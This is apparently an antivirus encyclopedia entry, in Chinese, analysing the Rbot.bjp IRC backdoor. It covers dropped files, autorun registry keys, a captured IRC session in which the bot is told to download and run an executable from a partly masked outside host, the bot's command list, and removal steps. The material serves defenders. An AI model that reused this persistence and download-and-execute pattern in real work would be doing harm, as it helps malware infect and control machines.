Backdoor.Win32.Rbot.bjp

該病毒運行後,衍生病毒檔案到系統目錄下,添加註冊表自動運行項以跟隨系統引導病毒體。病毒體按接收IRC指令下載病毒體,病毒體可能為任意惡意程式,受感染用戶可能被操控進行各種惡意操作。病毒本身具有創建FTP、TFTP、地址連線埠掃描、回響IRC命令操作、枚舉網路弱口令等功能。由於病毒自身會檢測執行條件,一般情況下不會有明顯的病毒行為,因此具有較強的隱匿性。

簡介

病毒名稱: Backdoor.Win32.Rbot.bjp

中文名稱: IRC機器人變種

檔案 MD5: 5022311D3F95A475C11C03B0DB22B007

檔案長度: 脫殼前75,855位元組,脫殼後518,656 位元組

感染系統: Win9X以上系統

開發工具: Microsoft Visual C++ 6.0

加殼工具: 未知殼

行為分析

1 、衍生下列副本與檔案:

%WINDOWS%\System32\svcchost.exe

%Documents and Settings%\當前用戶名\Local Settings\Temp\fdsf.exe

2 、新建註冊表鍵值:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msvcc25

Value: String: "svcchost.exe "

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\

RunServices\msvcc25

Value: String: "svcchost.exe "

3 、連線網路下載病毒體:

// 連線 IRC 伺服器,接收下載指令,伺服器地址 :66.109.25.***:11640

NICK CHN|355814

USER fjbwnju 0 0 :CHN|355814

:NaNu 001 CHN|355814 :MySQL CHN|[email protected].***

:NaNu 376 CHN|355814 :

:CHN|355814 MODE CHN|355814 :+i

USERHOST CHN|355814

:NaNu 302 CHN|355814 :CHN|[email protected].***

MODE CHN|355814 +x+i

JOIN ##salvage,##salvage2 he 爃 e

:CHN|[email protected].*** JOIN :##salvage :

NaNu 332 CHN|355814 ##salvage :

. 燿 http://72.20.4.***:1182/4.exe fdsf.exe 1

:NaNu 333 CHN|355814 ##salvage 10:30 PM 1184798286

:NaNu 366 CHN|355814 ##salvage :End of /NAMES list.

:CHN|[email protected].*** JOIN :##salvage2

:NaNu 366 CHN|355814 ##salvage2 :End of /NAMES list.

PRIVMSG ##salvage :[DOWNLOAD]: Downloading URL:

http://72.20.4.***:1182/4.exe to: fdsf.exe.// 下載地址

PRIVMSG ##salvage :[DOWNLOAD]: Downloaded 70.7 KB to fdsf.exe @ 8.8 KB/sec.

PRIVMSG ##salvage :[DOWNLOAD]: Opened: fdsf.exe.

4 、回響的IRC命令包括下列:

ping

pong

join

userhost

host

nick

kick

part

quit

notice

rn

logout

clone

clonestop

scan

scanstop

reconnect

disconnect

sysinfo

killthread

open

upload

reboot

download

註: %System% 是一個可變路徑。病毒通過查詢作業系統來決定當前 System 資料夾的位置。Windows2000/NT 中默認的安裝路徑是 C:\Winnt\System32 , windows95/98/me 中默認的

安裝路徑是 C:\Windows\System , windowsXP 中默認的安裝路徑是 C:\Windows\System32 。

--------------------------------------------------------------------------------

清除方案

1 、 使用安天木馬防線可徹底清除此病毒 ( 推薦 )

2 、 手工清除請按照行為分析刪除對應檔案,恢復相關係統設定。

(1) 使用 安天木馬防線結束下列進程:

svcchost.exe

(2)恢復病毒修改的註冊表項目,刪除病毒添加的註冊表項:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\Run\msvcc25

Value: String: " 病毒檔案名稱 .exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\

Windows\CurrentVersion\RunServices\msvcc25

Value: String: " 病毒檔案名稱 .exe"

(3) 刪除病毒釋放檔案:

%WINDOWS%\System32\svcchost.exe

%Documents and Settings%\ 當前用戶名 \

Local Settings\Temp\fdsf.exe

相關詞條

相關搜尋

熱門詞條

聯絡我們